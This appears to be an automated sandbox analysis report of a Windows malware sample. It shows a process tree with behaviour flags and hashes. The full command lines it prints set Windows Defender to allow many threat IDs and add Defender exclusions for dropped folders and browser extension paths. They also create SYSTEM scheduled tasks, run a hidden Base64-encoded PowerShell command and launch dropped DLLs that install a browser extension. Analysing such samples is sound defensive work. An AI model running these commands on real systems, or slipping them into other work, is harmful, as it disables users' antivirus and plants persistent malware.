        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
      (only the first statement is prefixed with "cmd /C", so it runs through cmd.exe below; PowerShell treats each later ";"-separated REG ADD as its own statement and spawns reg.exe directly)
      PID: 4908
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe
          cmdline: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
          PID: 740
          - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\reg.exe
              cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
              PID: 4920

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
          PID: 3704

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
          PID: 3804

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
          PID: 1828

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
          PID: 2100

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
          PID: 2752

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
          PID: 2104

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
          PID: 3376

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
          PID: 2748

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
          PID: 4324

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
          PID: 3392

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
          PID: 3104

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
          PID: 336

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
          PID: 2680

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
          PID: 1508

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
          PID: 848

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
          PID: 4520

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
          PID: 3124

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
          PID: 4756

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
          PID: 4628

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
          PID: 728

        C:\Windows\SysWOW64\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
          PID: 3140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4528
-
-
-
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HqWclUkqRTUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HqWclUkqRTUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MySKhCIAjPpVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MySKhCIAjPpVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PSrMLwgNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PSrMLwgNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uzjGIbOFKwqU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uzjGIbOFKwqU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TePbsdUgyxbrNIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TePbsdUgyxbrNIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gQwnIvOSfgVlPwgt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gQwnIvOSfgVlPwgt\" /t REG_DWORD /d 0 /reg:64;"
        - Drops file in System32 directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID:4156
        C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HqWclUkqRTUn" /t REG_DWORD /d 0 /reg:32
            PID:4960
            C:\Windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HqWclUkqRTUn" /t REG_DWORD /d 0 /reg:32
                PID:3800
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HqWclUkqRTUn" /t REG_DWORD /d 0 /reg:64
            PID:2188
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MySKhCIAjPpVC" /t REG_DWORD /d 0 /reg:32
            PID:1108
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MySKhCIAjPpVC" /t REG_DWORD /d 0 /reg:64
            PID:3168
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSrMLwgNU" /t REG_DWORD /d 0 /reg:32
            PID:1688
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSrMLwgNU" /t REG_DWORD /d 0 /reg:64
            PID:3472
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uzjGIbOFKwqU2" /t REG_DWORD /d 0 /reg:32
            PID:1224
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uzjGIbOFKwqU2" /t REG_DWORD /d 0 /reg:64
            PID:2608
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR" /t REG_DWORD /d 0 /reg:32
            PID:1644
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR" /t REG_DWORD /d 0 /reg:64
            PID:3188
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TePbsdUgyxbrNIVB /t REG_DWORD /d 0 /reg:32
            PID:1272
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TePbsdUgyxbrNIVB /t REG_DWORD /d 0 /reg:64
            PID:224
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
            PID:324
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
            PID:2444
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
            PID:2944
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
            PID:4344
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC /t REG_DWORD /d 0 /reg:32
            PID:4036
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC /t REG_DWORD /d 0 /reg:64
            PID:3564
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gQwnIvOSfgVlPwgt /t REG_DWORD /d 0 /reg:32
            PID:3568
        C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gQwnIvOSfgVlPwgt /t REG_DWORD /d 0 /reg:64
            PID:3660
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gaGsPMHZR" /SC once /ST 11:24:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        - Creates scheduled task(s)
        PID:5052
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gaGsPMHZR"
        PID:2984
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "gaGsPMHZR"
        PID:3428
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "pBhpQhEndrCBLmKcV" /SC once /ST 12:24:20 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gQwnIvOSfgVlPwgt\aaCbHJRwrvIgUrd\whfErpC.exe\" Lt /site_id 525403 /S" /V1 /F
        - Drops file in Windows directory
        - Creates scheduled task(s)
        PID:3796
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "pBhpQhEndrCBLmKcV"
        PID:3392
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4664
    C:\Windows\system32\gpupdate.exe
        "C:\Windows\system32\gpupdate.exe" /force
        PID:1704
C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
    PID:4376
C:\Windows\system32\gpscript.exe
    gpscript.exe /RefreshSystemParam
    PID:1352
C:\Windows\Temp\gQwnIvOSfgVlPwgt\aaCbHJRwrvIgUrd\whfErpC.exe
    C:\Windows\Temp\gQwnIvOSfgVlPwgt\aaCbHJRwrvIgUrd\whfErpC.exe Lt /site_id 525403 /S
    - Checks computer location settings
    - Executes dropped EXE
    - Drops Chrome extension
    - Drops desktop.ini file(s)
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:2680
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "bXdYnizyUUWLarOGTm"
        PID:4152
    C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
        PID:2556
        C:\Windows\SysWOW64\reg.exe
            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
            PID:4956
    C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
        PID:2696
        C:\Windows\SysWOW64\reg.exe
            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
            PID:4328
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\PSrMLwgNU\bZFMBx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "KlOugEwrPWYFNkY" /V1 /F
        - Drops file in Windows directory
        - Creates scheduled task(s)
        PID:824
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "KlOugEwrPWYFNkY2" /F /xml "C:\Program Files (x86)\PSrMLwgNU\hGHxdwB.xml" /RU "SYSTEM"
        - Creates scheduled task(s)
        PID:4820
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /END /TN "KlOugEwrPWYFNkY"
        PID:260
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "KlOugEwrPWYFNkY"
        PID:2644
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "vbwpVlLfpiGyIe" /F /xml "C:\Program Files (x86)\uzjGIbOFKwqU2\dXeoxoh.xml" /RU "SYSTEM"
        - Creates scheduled task(s)
        PID:3044
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "vLyprKZFGxqmA2" /F /xml "C:\ProgramData\TePbsdUgyxbrNIVB\TOBrVkB.xml" /RU "SYSTEM"
        - Creates scheduled task(s)
        PID:1428
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "cFPNTyBOVAcRTsSof2" /F /xml "C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR\HBfgzWt.xml" /RU "SYSTEM"
        - Creates scheduled task(s)
        PID:3256
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "lAuFQWjsQzWwDKXOUDY2" /F /xml "C:\Program Files (x86)\MySKhCIAjPpVC\xiMNyWU.xml" /RU "SYSTEM"
        - Creates scheduled task(s)
        PID:3788
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "oIOmecagrUeRFYAlI" /SC once /ST 02:46:48 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\gQwnIvOSfgVlPwgt\RxioLFxc\eolXLqJ.dll\",#1 /site_id 525403" /V1 /F
        - Drops file in Windows directory
        - Creates scheduled task(s)
        PID:4668
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "oIOmecagrUeRFYAlI"
        PID:2172
    C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
        PID:616
        C:\Windows\SysWOW64\reg.exe
            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
            PID:4156
    C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
        PID:4180
        C:\Windows\SysWOW64\reg.exe
            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
            PID:5052
    C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "pBhpQhEndrCBLmKcV"
        PID:1208
C:\Windows\system32\rundll32.EXE
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gQwnIvOSfgVlPwgt\RxioLFxc\eolXLqJ.dll",#1 /site_id 525403
    PID:216
    C:\Windows\SysWOW64\rundll32.exe
        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gQwnIvOSfgVlPwgt\RxioLFxc\eolXLqJ.dll",#1 /site_id 525403
        - Blocklisted process makes network request
        - Checks BIOS information in registry
        - Loads dropped DLL
        - Enumerates system info in registry
        - Modifies data under HKEY_USERS
        PID:320
        C:\Windows\SysWOW64\schtasks.exe
            schtasks /DELETE /F /TN "oIOmecagrUeRFYAlI"
            PID:1112
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 2KB
MD5: 7eb9d41309c102d1962927842b2d5192
SHA1: ba36b92426a4f11408b7a3b3e5ffc8c6d64e51b0
SHA256: e396128aa4974dc888732020b163788a7d52387d1f49b67c69ebae92db9dcced
SHA512: 8790b37592043d20c31ea7422ba5cd347a95abce8bf418d39a21a00de1387750741172c61cd61d3dc8b35d4c8e9404e6c73408291f303b0aa15978fe5b5695a1

Filesize: 2KB
MD5: c667e8d1ca89a19cf2c1650d5765c94e
SHA1: 71d0636360971d1867d09ab541ceb5f8adf4e56b
SHA256: ab94cf20d4c132c11f54a8aa0796d3609745a54a144a66a44f29370edfa66b44
SHA512: 646fb6b0ae9847cd816128e8aa5d41eb5b3d0a0465021ec352c3d5ec42236bb1a5f67ff898ab7e48af0fcf397f8245f2c271768f516d447099cdcfd61c596865

Filesize: 2KB
MD5: 3277f9493b57992d3c97138c90deafdb
SHA1: 0821148f3ac876d21f6e698083fb1fe3741b43b8
SHA256: cb389ec00c3c347a19805a0b438b9f314223b7154e8cd1b6574c0e97f5e3bf0a
SHA512: 120c9a1190d4ef420c0dbd20248cdd48887e048570247464dc5d28876476ecb6107455a972ac820f2322d4cfc951d41e4d365208760d9bd98567d18ef21484e6

Filesize: 2KB
MD5: afdfe28bb2537cba542bd6f1e12d28aa
SHA1: ecbfae574986e2130d2ae6980035c9d1acfdd5f8
SHA256: be73acd334bbc06037944aec9b5559b867d38eff0f9291323fc6823fe55e8047
SHA512: ab29bc1ca3999694e7c6400855f2fdd68e9e7e649f186b545ba84efa9698242525d5cb1c62dd4db32c57782019565c5b6b65bc4e961431e64d69541fc88ed0c9

Filesize: 1.1MB
